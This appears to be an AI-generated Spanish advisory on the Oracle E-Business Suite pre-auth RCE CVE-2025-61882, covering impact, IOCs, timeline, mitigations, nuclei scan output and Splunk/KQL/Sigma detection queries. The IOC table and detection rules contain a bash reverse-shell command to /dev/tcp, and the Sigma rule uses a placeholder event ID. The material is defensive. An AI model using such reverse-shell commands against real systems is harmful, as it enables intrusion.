
Proporciona un aviso detallado de CVE-2025-61882 con análisis técnico, IOCs, consultas de detección y una plantilla de exploit basada en nuclei para RCE sin autenticación previa en Oracle E-Business Suite.
Resumen breve: Ejecución remota de código crítica pre‑autenticación en Oracle E‑Business Suite (EBS) — afecta a 12.2.3 → 12.2.14, CVSS 9.8, explotada activamente en el mundo real (se ha informado de actividad de ransomware/extorsión). ([oracle.com][1])
| Campo | Detalles |
|---|
| 🆔 CVE | CVE‑2025‑61882 |
| 🧾 Producto / Componente | Oracle E‑Business Suite (EBS) — integración de Concurrent Processing / BI Publisher |
| 📦 Versiones afectadas | 12.2.3 → 12.2.14 |
| 🔢 CVSS (v3.1) | 9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H) |
| ⚠️ Tipo | Ejecución Remota de Código (RCE) — no se requiere autenticación |
| 🔥 Explotada en el mundo real | Sí — se ha informado de campañas de explotación masiva / extorsión |
| 📅 Divulgación / cronología | Octubre de 2025 (aviso del proveedor + análisis públicos). ([oracle.com][1]) |
(Lo anterior consolidado a partir del aviso del proveedor, NVD/CISA y múltiples análisis de proveedores.) ([oracle.com][1])
| Área de impacto | Qué significa |
|---|---|
| 🔓 Confidencialidad | Los atacantes pueden leer datos sensibles de RR. HH., finanzas y ERP |
| 🛠️ Integridad | Los atacantes pueden modificar registros, crear puertas traseras o alterar configuraciones |
| ⚡ Disponibilidad | Los atacantes pueden interrumpir servicios, ejecutar ransomware o destruir copias de seguridad |
| 🧭 Nivel de riesgo | Extremo — RCE pre‑autenticación en un sistema ERP crítico → posible pivote completo de dominio |
Referencias que informan de explotación de alto impacto y vínculos con ransomware. ([Rapid7][2])
Oracle y los equipos de respuesta a incidentes publicaron IOCs; a continuación se muestran ejemplos representativos informados en avisos y análisis de proveedores. Busque estos patrones en registros y endpoints. ([oracle.com][1])
| Tipo | Ejemplo |
|---|---|
| 🌐 IPs (observadas) | 200.107.207.26, 185.181.60.11 (direcciones de ejemplo informadas) |
| 🧾 Patrón de comando | sh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell) |
| 🗂️ Hashes de archivos | Varios hashes SHA‑256 para scripts de explotación sospechosos (consulte el aviso del proveedor para la lista completa) |
| 🕳️ Artefactos | Web shells inesperados, nuevos cronjobs, conexiones salientes sospechosas a IPs/puertos inusuales |
Si desea la lista completa de IOCs (IPs, hashes completos, nombres de archivo), puedo pegarla aquí — diga “pegar IOCs”. (Sin enlaces.)
| Fecha | Evento |
|---|---|
| 9 de agosto de 2025 | Primera actividad de explotación en el mundo real informada (telemetría del proveedor). ([crowdstrike.com][4]) |
| Principios de octubre de 2025 | Oracle emitió una alerta de seguridad / disponibilidad de parche para EBS. ([oracle.com][1]) |
| 6–7 de octubre de 2025 | CISA añadió el CVE a su catálogo de Vulnerabilidades Explotadas Conocidas (KEV) (orientación para agencias federales, fecha límite para la mitigación). ([cisa.gov][5]) |
| Octubre de 2025 (en curso) | Múltiples análisis de proveedores e informes de explotación masiva (CrowdStrike, Rapid7, Tenable, etc.). ([crowdstrike.com][4]) |
| Prioridad | Acción | Notas / Especificaciones de ejemplo |
|---|---|---|
| 1️⃣ Crítica | Parchear las instancias de EBS afectadas | Aplique los parches de la Alerta de Seguridad de Oracle para las versiones 12.2.3–12.2.14 inmediatamente. ([oracle.com][1]) |
| 2️⃣ Alta | Aislar / restringir el acceso a los endpoints web de EBS | Bloquee HTTP/HTTPS de cara a Internet hacia EBS; permita solo IPs de administración de confianza o VPN. |
| 3️⃣ Alta | Habilitar/ajustar reglas WAF | Implemente firmas WAF de proveedores/comunidad para los patrones de explotación; bloquee payloads sospechosos. ([Rapid7][2]) |
| 4️⃣ Alta | Buscar y detectar | Busque en los registros comandos de reverse shell, escrituras de archivos anómalas y conexiones salientes hacia IOCs. |
| 5️⃣ Incidente | Contener y responder si se encuentra compromiso | Aísle el host, conserve la evidencia forense, cambie las credenciales, reconstruya desde copias de seguridad limpias. |
| 6️⃣ Política | Informar y notificar | Si está sujeto a requisitos normativos/contractuales, notifique a las partes interesadas y a las autoridades según la política (la orientación de CISA/KEV puede aplicar). ([nvd.nist.gov][3]) |
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.


Splunk (búsqueda del patrón de reverse shell):
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*")
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw
ELK / Kibana (KQL):
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"
Regla Sigma (conceptual):
title: Oracle EBS Reverse Shell via HTTP
detection:
selection:
EventID: 1234
ProcessCommandLine|contains: "/dev/tcp/"
condition: selection
(Ajuste los nombres de los campos a su esquema de registros; use los IOCs para refinar.)
80/443 entrante hacia los servidores EBS desde Internet público; permita solo la VPN de gestión e IPs de administración específicas.bash -i, /dev/tcp/, base64 -d o patrones típicos de payloads de explotación en cuerpos POST o parámetros de URL.(Enumero las fuentes para mayor precisión — no pegaré enlaces aquí, pero estos son los nombres de proveedores/autoridades para que pueda consultarlos si es necesario.)
La información proporcionada en este informe es solo con fines de concienciación, defensa y educación. El uso de esta información para explotar, atacar o comprometer cualquier sistema sin autorización explícita es ilegal y puede dar lugar a sanciones penales y civiles.
🔒 Aplique siempre los parches recomendados, siga las mejores prácticas de seguridad y realice pruebas únicamente en entornos controlados.
🧾 Este informe no sustituye los avisos oficiales del proveedor — consulte siempre las Alertas de Seguridad de Oracle y la orientación autorizada para obtener instrucciones definitivas de remediación.